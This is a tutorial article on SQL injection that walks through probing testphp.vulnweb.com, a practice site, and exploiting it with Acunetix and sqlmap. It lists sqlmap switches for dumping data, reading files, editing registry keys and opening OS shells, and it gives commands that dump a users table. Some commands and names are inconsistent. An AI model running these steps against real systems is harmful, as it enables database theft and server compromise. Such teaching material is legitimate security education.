By Adam Karim
SQL injection (SQLi)
SQLi is the most well-known of all web application flaws and most web application security professionals have some familiarity with SQL injection flaws that allow a hacker’s use of malicious code to bypass web application security and gain access to databases.
How Does a SQL Injection Attack Work?
SQL injection is the most dangerous security risk for web applications. Attacks usually result in data being deleted or destroyed and could lead to the entire webserver being compromised.
Before we can find SQL injection vulnerabilities, we must first identify the locations where data can be found and passed into a database.
Authentication is usually supported by the database and depends on the nature of the web application; other domains, such as a web form, messaging website e-commerce often require interaction with the database.
Identify SQL Injection vulnerability
We can identify SQL injection vulnerabilities by just using a single quote ('), which SQL uses as a string delimiter, as a simple check for possible SQL injection vulnerabilities. If the application does not handle this character correctly, it causes a database error and it means SQL injection vulnerability exists, as shown in figure below.
testphp.vulnweb.com/listproducts.php?cat=1'
This error message tells us a few things: we’ve caused an error in a SQL statement, the database server is MYSQL and the server is running on Linux.
How it happens
We usually start our attack by entering a single quote in each field that we suspect to pass its parameters to the database. If we had access to the application's source code, we could inspect it for SQL queries built by string concatenation. In PHP code, the SQL query looks like this:
mysql> SELECT * FROM users WHERE username = ‘$user’ AND password = ‘$pass’ ”;
If user-controlled input, such as $user and $pass, is included in an SQL statement and that is not cleaned in any way, the possibility of SQL injection is very high. Let's analyse this with some examples. During normal login, users can submit "Adam" and "p@ssword2000" for their username and password. So, the code will look like this:
mysql> SELECT * FROM users WHERE username = ‘Adam’ AND password = ‘p@ssword2000’ ”;
Notice how the submitted values are protected in quotes. Let's see what happens if we send a GET request with injection payload contain a single quote:
mysql> SELECT * FROM users WHERE username = ‘ ’ ’ AND password = ‘p@ssword2000’ ”;
Since a single quote is used for the delimiter, the query above reads as an empty username and then a lost string creating a syntax error means the code of SQL injection payload worked well.
Acunetix vulnerability scanner
This scanner automates web vulnerability assessment and management. Once logged in, the Acunetix dashboard shows you the total number of vulnerabilities discovered across your targets, organized according to severity levels high, medium and low.
Scanning website vulnerability using Acunetix vulnerability
1.Acunetix vulnerability scanner
We are using a fully licensed version of Acunetix vulnerability scanner - V.14 in our case.
1.1 Configuration target URL
First, we will add the URL target into Acunetix and save it. In our case, using URL http://testphp.vulnweb.com/
testphp.vulnweb.com is a live website created by Acunetix where it's legal to test your skills to perform SQL injection and the database installed with default configuration, which is vulnerable for SQL injection attack.
A target is a website, web application or web server to scan for vulnerabilities.
1.2 Scanning target for vulnerabilities
Now, we can configure target options and assign a different level of criticality (Low, Normal, High, Critical).
1.3 Display a list of vulnerabilities
When the scanning of the target is finished, it’s time to review the result of the scan. In our case, we found that the target is vulnerable for SQL injections.
1.4 Saving http request to file
Now, we can save the HTTP request to the vuln.txt file that contains the injection point.
2. Exploit website vulnerability using Automating SQL Injection (sqlmap)
Sqlmap is an open source, Python-based, command-line SQL injection tool of awesomeness that can be used to identify and exploit SQL injection vulnerabilities against various databases.
2.1 sqlmap: -h and -hh
sqlmap includes two different help switches, -h and -hh, that provide a basic and a more complete syntax guide.
2.2 sqlmap: Define and connect to the target
sqlmap can be used as the SQLi starting point. From this vantage point, we could use sqlmap to discover SQL Injection flaws in the first place. The following switches are useful to let sqlmap do the discovery:
-u – A: Target URL.
--crawl: Spiders the site trying to discover entry points for testing.
--forms: Target forms for injection.
--dbms: If we already know or have a good guess about the backend DB, we can inform sqlmap.
2.3 sqlmap: Database Enumeration
Dumping the schema/metadata from the backend is a key step that sqlmap makes significantly easier without us having to bang our heads against syntax needlessly.
--schema: Dump the entire DBMS database, table, and column names.
--dbs/--tables/--columns: These switches can be used to be more tactical than dumping the full
list as with schema.
-D/-T: Can be coupled with the above switch to, for example, list only tables in the Customer DB (-D
Customer --tables).
2.4 sqlmap: Database Data Exfiltration
Exfiltrating data is the primary concern for most organizations when considering SQL injection. Now that the metadata has been enumerated, the following switches can exfiltrate data from interesting DBs, tables, or columns. These can also prove that data can be exfiltrated without stealing it with the --count switch:
--all: Dumps all data && metadata
--count: No data exfiltrated; simply provides a count of records
--dump: Steals data given the applied constraints (e.g., -D Orders -T Customers --dump)
--dump-all: Exfiltrates all table data
--search – Scours DB/table/column for a string (e.g., user or pass)
2.5 sqlmap key switches: beyond Database Data Exfiltration
sqlmap switches for digging in deeper on the database server itself. Extremely useful for databases that targets
suggest "don't contain anything sensitive."
--users: Enumerate DB user accounts
--passwords: Show DB user account hashes
--file-read: Download files to attack system
--file-write: Upload files to DB system
--reg-read/--reg-write: Read/Write Windows registry keys
--reg-add/--reg-del: Add/Delete Windows registry keys
2.6 sqlmap key switches: Post Exploitation
Without question, the following options are the most talked about sqlmap capabilities. Most organizations, and even security professionals, are unaware of the potential for SQL Injection to yield these sorts of capabilities.
--priv-esc: Escalate privileges of DB
--sql-query/--sql-shell: Run single SQL query or get simulated interactive SQL shell
--os-cmd/--os-shell: Execute single OS command or get simulated interactive OS shell
--os-pwn: Metasploit shell/VNC/Meterpreter
2.7. Use sqlmap to obtain the type of database management system (DBMS) and the name of the database
-r: Load HTTP request from a file
--dbs: fetch database name
python sqlmap.py -r vuln.txt --dbs
Now, we have successfully retrieved the database name “acuart”.
2.8. Extracting tables from the acuart database
Databases consist of multiple tables, let’s try to extract all the tables from the “acuart” database.
-D: DBMS database to enumerate
--tables: Enumerate DBMS database tables
python sqlmap.py -r vuln.txt -D acuart --tables
2.9. Finding users’ columns
Now we will try to find the “users” table inside the database ”acuart”.
-T: DBMS database tables to enumerate (retrieve table name)
--columns: Enumerate DBMS database table columns
python sqlmap.py -r vuln.txt -D acuart --tables
2.10. Get data from a user’s table
Usually, the “users” table contains login credentials of the users.
python sqlmap.py -r vuln.txt -D actuary -T users --dump
In the above figure, we can see sqlmap has extracted the entire information of table users.
Conclusion
This article shows how hackers or penetration testers scan websites to find the vulnerability and exploit it using Acunetix vulnerability scanner and sqlmap. SQL injection is considered the most dangerous attack in web hacking, and it was counted among top 10 web hacking techniques of 2022.
References:
